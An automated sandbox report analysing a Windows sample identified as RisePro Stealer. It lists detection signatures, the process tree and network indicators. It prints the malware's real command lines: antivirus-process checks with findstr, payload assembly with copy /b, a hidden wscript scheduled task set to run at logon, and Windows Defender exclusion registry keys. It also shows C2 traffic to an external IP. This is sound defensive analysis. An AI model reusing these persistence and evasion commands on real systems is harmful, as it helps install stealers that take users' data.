Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5daucomrx8.exe

Overview

General Information

Sample name:5daucomrx8.exe
renamed because original name is a hash value
Original sample name:33ff8752083bf6b5105749bf5b772b4a.exe
Analysis ID:1519279
MD5:33ff8752083bf6b5105749bf5b772b4a
SHA1:01f8869d2fcd4ff1184dfc956905e01eb15f0d92
SHA256:ee6ee03724690a677d4bf2610ea86d94eaeb94068d627fe36ec2f0353cc1c9ba
Tags:exeuser-abuse_ch
Infos:

Detection

RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected RisePro Stealer
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Contains functionality to inject threads in other processes
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops PE files with a suspicious file extension
Exclude list of file types from scheduled, custom, and real-time scanning
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Modifies Group Policy settings
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Wscript called in batch mode (surpress errors)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Windows Defender Exclusions Added - Registry
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • 5daucomrx8.exe (PID: 3524 cmdline: "C:\Users\user\Desktop\5daucomrx8.exe" MD5: 33FF8752083BF6B5105749BF5B772B4A)
    • cmd.exe (PID: 5584 cmdline: "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 4276 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3900 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6368 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3836 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3760 cmdline: cmd /c md 369580 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 4500 cmdline: findstr /V "MaskBathroomsCompoundInjection" Participants MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1468 cmdline: cmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\Z MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Origin.pif (PID: 6952 cmdline: 369580\Origin.pif 369580\Z MD5: B06E67F9767E5023892D9698703AD098)
        • schtasks.exe (PID: 5224 cmdline: schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Origin.pif (PID: 3848 cmdline: C:\Users\user\AppData\Local\Temp\369580\Origin.pif MD5: B06E67F9767E5023892D9698703AD098)
      • timeout.exe (PID: 5964 cmdline: timeout 15 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 4820 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SecureHawk.pif (PID: 6692 cmdline: "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif" "C:\Users\user\AppData\Local\LinkGuard Dynamics\r" MD5: B06E67F9767E5023892D9698703AD098)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: Origin.pif PID: 3848JoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 369580\Origin.pif 369580\Z, ParentImage: C:\Users\user\AppData\Local\Temp\369580\Origin.pif, ParentProcessId: 6952, ParentProcessName: Origin.pif, ProcessCommandLine: schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 5224, ProcessName: schtasks.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js", ProcessId: 4820, ProcessName: wscript.exe
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 369580\Origin.pif 369580\Z, CommandLine: 369580\Origin.pif 369580\Z, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\369580\Origin.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\369580\Origin.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\369580\Origin.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5584, ParentProcessName: cmd.exe, ProcessCommandLine: 369580\Origin.pif 369580\Z, ProcessId: 6952, ProcessName: Origin.pif
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 369580\Origin.pif 369580\Z, ParentImage: C:\Users\user\AppData\Local\Temp\369580\Origin.pif, ParentProcessId: 6952, ParentProcessName: Origin.pif, ProcessCommandLine: schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 5224, ProcessName: schtasks.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\5daucomrx8.exe", ParentImage: C:\Users\user\Desktop\5daucomrx8.exe, ParentProcessId: 3524, ParentProcessName: 5daucomrx8.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit, ProcessId: 5584, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 369580\Origin.pif 369580\Z, ParentImage: C:\Users\user\AppData\Local\Temp\369580\Origin.pif, ParentProcessId: 6952, ParentProcessName: Origin.pif, ProcessCommandLine: schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 5224, ProcessName: schtasks.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js", ProcessId: 4820, ProcessName: wscript.exe
    Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\369580\Origin.pif, ProcessId: 3848, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5584, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 3836, ProcessName: findstr.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:53:17.211359+020020490601A Network Trojan was detected192.168.2.8497103.36.173.850500TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:53:20.188890+020020462691A Network Trojan was detected192.168.2.8497103.36.173.850500TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 5daucomrx8.exeReversingLabs: Detection: 31%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_01056B00 CryptUnprotectData,CryptUnprotectData,LocalFree,LocalFree,21_2_01056B00
    Source: 5daucomrx8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 5daucomrx8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

    Change of critical system settings

    barindex
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_ExtensionsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{52D21685-6F41-4E1C-A1BC-43C6191BF968}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exeJump to behavior
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\5daucomrx8.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_003547B7 GetFileAttributesW,FindFirstFileW,FindClose,17_2_003547B7
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00353E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00353E72
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0035C16C
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035CB81 FindFirstFileW,FindClose,17_2_0035CB81
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_0035CC0C
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0035F445
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0035F5A2
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0035F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0035F8A3
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_00353B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00353B4F
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00B0C16C
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B047B7 GetFileAttributesW,FindFirstFileW,FindClose,21_2_00B047B7
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0CB81 FindFirstFileW,FindClose,21_2_00B0CB81
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,21_2_00B0CC0C
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00B0F445
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00B0F5A2
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B0F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00B0F8A3
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B03B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00B03B4F
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00B03E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00B03E72
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_00FC2022 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,21_2_00FC2022
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_01056000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose,21_2_01056000
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_01076770 FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,CreateDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,21_2_01076770
    Source: C:\Users\user\AppData\Local\Temp\369580\Origin.pifCode function: 21_2_010238D0 FindFirstFileA,FindNextFileA,GetLastError,FindClose,21_2_010238D0

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2049060 - Severity 1 - ET MALWARE RisePro TCP Heartbeat Packet : 192.168.2.8:49710 -> 3.36.173.8:50500
    Source: Network trafficSuricata IDS: 2046269 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Activity) : 192.168.2.8:49710 -> 3.36.173.8:50500
    Source: global trafficTCP traffic: 192.168.2.8:49710 -> 3.36.173.8:50500
    Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
    Source: unknownDNS traffic detected: query: jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHD replaycode: Name error (3)
    Source: unknownTCP traffic detected without corresponding DNS query: 3.36.173.8
    Source: unknownTCP traffic detected without corresponding DNS query: 3.36.173.8
    Source: unknownTCP traffic detected without corresponding DNS query: 3.36.173.8
    Source: unknownTCP traffic detected without corresponding DNS query: 3.36.173.8
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifCode function: 17_2_0036279E InternetReadFile,InternetQueryDataAvailable,InternetReadFile,17_2_0036279E
    Source: global trafficDNS traffic detected: DNS query: jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHD
    Source: 5daucomrx8.exe, 00000000.00000003.1530090678.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, SecureHawk.pif.11.dr, Beginning.0.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
    Source: 5daucomrx8.exe, 00000000.00000003.1530090678.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, SecureHawk.pif.11.dr, Beginning.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
    Source: 5daucomrx8.exe, 00000000.00000003.1530090678.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, SecureHawk.pif.11.dr, Beginning.0.drString found in binary or memory: http://crl.globalsign.net/root.crl0
    Source: 5daucomrx8.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 5daucomrx8.exe, 00000000.00000003.1530090678.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, SecureHawk.pif.11.dr, Beginning.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
    Source: Origin.pif, 00000015.00000002.3983887690.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesign0
    Source: 5daucomrx8.exe, 00000000.00000003.1530090678.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, SecureHawk.pif.11.dr, Beginning.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
    Source: 5daucomrx8.exe, 00000000.00000003.1530090678.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, SecureHawk.pif.11.dr, Beginning.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
    Source: 5daucomrx8.exe, 00000000.00000003.1530090678.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, SecureHawk.pif.11.dr, Beginning.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/0
    Source: 5daucomrx8.exe, 00000000.00000003.1560779161.0000000002900000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 0000000B.00000000.1595592768.0000000000B68000.00000002.00000001.01000000.00000005.sdmp, SecureHawk.pif, 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmp, Origin.pif, 00000015.00000002.3983571280.0000000000B68000.00000002.00000001.01000000.00000005.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, Studios.0.dr, SecureHawk.pif.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: Origin.pif, Origin.pif, 00000015.00000002.3983668133.0000000000F90000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
    Source: Origin.pifString found in binary or memory: https://ipinfo.io/
    Source: Origin.pif, 00000015.00000002.3983668133.0000000000F90000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
    Source: Origin.pif, 00000015.00000002.3983887690.0000000001257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT
    Source: 5daucomrx8.exe, 00000000.00000003.1530090678.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3983887690.000000000129E000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, SecureHawk.pif.11.dr, Beginning.0.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: 5daucomrx8.exe, 00000000.00000003.1530090678.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, SecureHawk.pif.11.dr, Beginning.0.drString found in binary or memory: https://www.globalsign.com/repository/03
    Source: Origin.pif, 00000015.00000002.3983887690.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/x
    Source: Origin.pifString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
